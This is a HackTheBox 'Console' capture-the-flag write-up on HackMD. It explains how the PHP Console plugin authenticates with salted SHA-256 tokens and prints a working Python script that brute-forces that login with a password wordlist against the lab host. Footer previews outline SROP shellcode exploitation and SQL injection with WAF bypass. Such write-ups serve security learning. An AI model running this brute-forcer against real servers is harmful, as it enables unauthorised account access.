# HackTheBox - Console Googling leads us to this plugin: https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef Looking at the requests and code we can confirm it is using that plugin. The plugin uses multiple sha256 sums of the password for authentication. Source Code: https://github.com/barbushin/php-console We can simply copy the "publickey", it's just a hash of the IP and basic UID. For Simplicity's sake we just copy it. There is a field in the response headers `isSuccess` telling us if we successfully authenticated or not. I created a bruteforcing script that can be found below. ## Code ```python= import requests import json import base64 from hashlib import sha256 wordlist = open('/usr/share/seclists/Passwords/darkweb2017-top1000.txt') publickey = 'd1d58b2f732fd546d9507da275a71bddc0c2300a214af3f3f3a5f5f249fe275e' URL = 'http://docker.hackthebox.eu:31061/' pw = wordlist.readline().strip() def gen_token(pw): salt = 'NeverChangeIt:)' pw_hash = sha256(pw+salt).hexdigest() return sha256(pw_hash+publickey).hexdigest() def bf(): while pw: print(pw) data = {"php-console-client":5,"auth":{"publicKey":publickey,"token":gen_token(pw)}} cookies = {"php-console-client":base64.b64encode(json.dumps(data))} print(cookies) r = requests.post(URL,allow_redirects=False,cookies=cookies) #print(str(r.headers)) if not '"isSuccess":false' in str(r.headers): print("Password found: "+pw) print(r.headers) break pw = wordlist.readline().strip() bf() # Password found: poohbear ``` ###### tags: `CTF` `HTB` `Web`
Last changed by  
imth
just your friendly neighbourhood hacker Twitter: @imthoe
252

Read more

SROP - Sigreturn Oriented Programming

A few months ago a colleague of mine created a simple buffer overflow challenge to teach others how to defeat ASLR. The program itself was written in assembly and only consisted of 3 syscalls more or less – read, write and exit. The overflow was easy, there was no boundary check or anything and you could simply write data to the stack. Since the purpose of the challenge was to defeat only ASLR, NX was disabled. The intended solution was to leak a stack address via the write syscall, write some shellcode to the stack, calculate the offset with the leaked address and jump to it. When I started working on the challenge it never occurred to me that I could use a write syscall to leak an address. That's when I dug down the rabbit hole. After some researching I stumpled upon a technique that I had not heard of before: SROP. Spoiler Alert, I didn't solve the challenge with SROP because I was only able to read 58 bytes. I'll explain in a moment why that's important. I was intrigued either way and started learning about it. SROP stands for Sigreturn Oriented Programming and unlike Return Oriented Programming only requires 2 Gadgets, the ability to write 300 bytes to the stack and the ability to control the Instruction Pointer. The required gadgets are a sigreturn and a syscall return gadget. In older Linux Kernels these are often already available at a fixed address. A sigreturn is used to return from the signal handler and to clean up the stack frame after a signal has been unblocked. And "cleaning up the stack frame" really means it's restoring important context data that has been saved on the stack temporarily. This data includes values of all registers and some things that are unrelevant for exploitation, which is also the reason why at least 300 bytes are required for it to work. I won't go into detail about the context struct that is used to store this data. The python library pwntools already provides an easy method to forge these structs. This will allow us to control all registers with only a single gadget. Once these requirements are met it's possible to do basically anything. In my exploit I will use mprotect to make a memory segment with a fixed address writable and executable, shift the stack to this address space,write some shellcode on the stack and execute it by returning to it.

10/10/2021
HackTheBox - Intense

Enumeration Nmap: # Nmap 7.80 scan initiated Sat Jul 11 17:54:15 2020 as: nmap -sC -sV -oN nmap 10.10.10.195 Nmap scan report for 10.10.10.195 Host is up (0.043s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:

4/9/2021
HackTheBox - Multimaster

Foothold Webserver with /api/getColleagues SQL Injection with a WAF Bypass User Simple Data Exfil http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/ https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

6/1/2020
Read more from imth
Published on HackMD